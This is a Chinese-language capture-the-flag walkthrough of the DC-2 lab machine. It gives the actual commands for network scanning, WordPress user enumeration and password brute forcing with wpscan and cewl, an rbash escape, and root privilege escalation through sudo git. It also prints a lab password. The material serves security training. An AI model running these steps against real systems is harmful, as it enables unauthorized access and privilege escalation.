DC2靶机渗透测试
文章目录
- 目标:收集 5 个 flag
- 一、信息收集
- 1.主机发现
- 2.端口扫描
- 二、漏洞挖掘
- 1.访问靶机 80 端口,查看其使用了什么 cms
- 2.目录扫描
- 3.扫描用户名
- 4.生成字典
- 5.爆破密码
- 6.使用账号密码登陆,在登陆 Jerry 时发现 flag2
- 7.使用 ssh
- 1.使用 jerry 登陆,失败,得知该 ssh 密码与 wordpress 密码不一致
- 2.使用 tom 登陆,成功
- 8.rbash绕过
- 9.git 提权
目标:收集 5 个 flag
一、信息收集
1.主机发现
已知靶机与攻击机在同一网段,扫描同网段
arp-scan -l
发现靶机 ip
2.端口扫描
nmap -A -p- 192.168.43.105 # -A 全面扫描 # -p- 扫描全面端口
发现开放了 80 端口,Apache 服务
开放了 7744 端口 ssh 服务
二、漏洞挖掘
1.访问靶机 80 端口,查看其使用了什么 cms
发现 wordpress 框架,及 flag 1
若是跳转到 http://dc-2 域名然后无法访问,将 ip 地址、域名 添加到 /etc/hosts 文件
hosts : 定义IP地址和主机名的映射关系,是一个映射IP地址和主机名的规定。 将一些常用的网址域名对应的 IP 地址记录,加快域名解析、屏蔽网站等
flag1
你通常的单词列表可能不起作用,所以,也许你只需要 cewl。
更多的密码永远是更好的,但有时你就是不能赢得他们的全部。以一个身份登录以查看下一个标志。 如果你找不到,就以另一个人的身份登录。
根据提示,可能需要使用 cewl ,以及用户切换操作
2.目录扫描
nikto -h 192.168.1.110
发现登陆页面
3.扫描用户名
wpscan --url dc-2 -e u
4.生成字典
cewl dc-2 -w dict.txt
5.爆破密码
wpscan --url dc-2 -P 1.txt
6.使用账号密码登陆,在登陆 Jerry 时发现 flag2
如果你不能利用WordPress和走捷径,还有另外一种方法。希望你找到了另一个入口。
7.使用 ssh
根据端口扫描,发现开启了ssh服务,我们先尝试连接:
1.使用 jerry 登陆,失败,得知该 ssh 密码与 wordpress 密码不一致
2.使用 tom 登陆,成功
使用 ls 查看文件,发现 flag3 ,使用 cat 打印却提示 -rbash 权限限制
尝试使用 vim、vi,发现 vi 成功进入编辑界面,
可怜的老汤姆总是追着杰里,也许他应该克服他所造成的压力。
提示切换用户,可恶,谜语人
8.rbash绕过
使用 su jerry 发现 su 被 rbash,使用以下方法绕过 rbash
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
切换用户,jerry/adipiscing
切换到 /home/jerry 目录,发现 flag 4
很高兴看到你走了这么远,但你还没回家。 你仍然需要得到最后的旗子(唯一真正重要的标志!)。 这里没有提示-你现在只能靠自己了。 快-快离开这里!
虽然还舞舞轩轩,但是还是提示了 Git 提权
9.git 提权
sudo git -p help
!/bin/sh
查找最后的 flag,在 /root/ 目录下 发现 final-flag.txt
总结
